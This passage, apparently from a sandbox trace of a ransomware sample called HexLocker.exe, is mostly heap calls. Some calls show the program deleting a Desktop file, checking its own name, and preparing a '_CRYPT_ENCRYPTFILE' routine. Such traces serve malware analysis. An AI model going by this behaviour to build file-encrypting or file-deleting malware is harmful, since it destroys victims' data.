0x2e53908 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0181.762] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0181.763] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0181.763] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLK.hex", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", lpFilePart=0x8cedf4*="HexLK.hex") returned 0x21 [0181.763] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0181.763] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex")) returned 0x20 [0181.763] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3faede2, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3faede2, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexLK.hex", cAlternateFileName="")) returned 0xa872d0 [0181.763] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex")) returned 1 [0181.819] FindNextFileW (in: hFindFile=0xa872d0, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3faede2, ftCreationTime.dwHighDateTime=0x1d67c7d, ftLastAccessTime.dwLowDateTime=0xd3faede2, ftLastAccessTime.dwHighDateTime=0x1d67c7d, ftLastWriteTime.dwLowDateTime=0xd3ffc408, ftLastWriteTime.dwHighDateTime=0x1d67c7d, nFileSizeHigh=0x0, nFileSizeLow=0xc4066, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="HexLK.hex", cAlternateFileName="")) returned 0 [0181.819] FindClose (in: hFindFile=0xa872d0 | out: hFindFile=0xa872d0) returned 1 [0181.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0181.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c48 | out: hHeap=0x970000) returned 1 [0181.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0181.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0181.821] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0181.821] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0181.821] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b88 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69888 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0181.821] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0181.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0181.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538f0 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69888 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b88 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0181.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.822] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x44) returned 0x2e563a8 [0181.822] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HexLK.hex", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex", lpFilePart=0x8cf650*="HexLK.hex") returned 0x21 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0181.822] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\HexLK.hex" (normalized: "c:\\users\\fd1hvy\\desktop\\hexlk.hex")) returned 0xffffffff [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0181.822] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0181.823] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0181.823] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.823] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0181.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0181.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0181.823] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0181.823] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexLocker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exLocker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xLocker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Locker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0181.823] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0181.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0181.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ker.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0181.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0181.824] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.exe", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0181.824] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0181.824] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0181.824] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0181.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0181.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0181.825] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e79310 [0181.825] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0181.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HexLocker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0181.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="exLocker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0181.825] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xLocker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Locker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ocker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ker.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0181.826] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="er.exe", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0181.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0181.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79338 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53788 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53770 | out: hHeap=0x970000) returned 1 [0181.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53770 [0181.826] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0181.826] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0181.826] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0181.827] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b48 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0181.827] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ba8 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b88 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0181.827] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0181.827] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ba8 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ca8 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0181.828] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff80 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54be8 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff80 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54be8 | out: hHeap=0x970000) returned 1 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b98 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0181.828] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0181.828] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c88 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cb8 [0181.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cb8 | out: hHeap=0x970000) returned 1 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53908 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0181.829] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53860 | out: hHeap=0x970000) returned 1 [0181.829] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54800 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53860 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54828 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0181.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538d8 | out: hHeap=0x970000) returned 1 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e547b0 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0181.830] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54580 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545a8 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0181.830] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0181.830] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0181.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0181.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0181.831] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54698 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0181.887] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ae8 | out: hHeap=0x970000) returned 1 [0181.887] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e545d0 [0181.887] HeapFree (in: hHeap=0x970000, 